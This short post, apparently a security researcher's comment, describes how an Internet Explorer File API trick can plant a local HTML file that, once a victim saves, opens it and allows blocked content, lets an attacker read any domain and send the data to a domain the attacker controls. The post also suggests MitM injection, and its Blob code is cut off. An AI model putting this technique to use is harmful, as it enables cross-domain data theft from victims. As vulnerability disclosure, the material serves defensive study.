I did a small improvement in this attack. Using IE File API (https://msdn.microsoft.com/en-us/library/hh772315(v=vs.85).aspx) an attacker would be able to create a web page with the content below and send to a victim. A local file with the same content that I sent previously would be created on download default folder. If the victim perform the three following clicks (Save, Open and Allow blocked content) an attacker would be able to perform any request to any domain and send the content to a domain which he/she has control. If the attacker is a MitM position this could be more intersting. Since the attacker could inject this content in a HTTP page and the victim will tend to relay on that. Next step would be force the victim to click on Save, Open and Allow blocked content buttons. Saving Files Locally if (typeof Blob !== "undefined") { demoBlobs(); } function demoBlobs(){ var blob = new Blob(["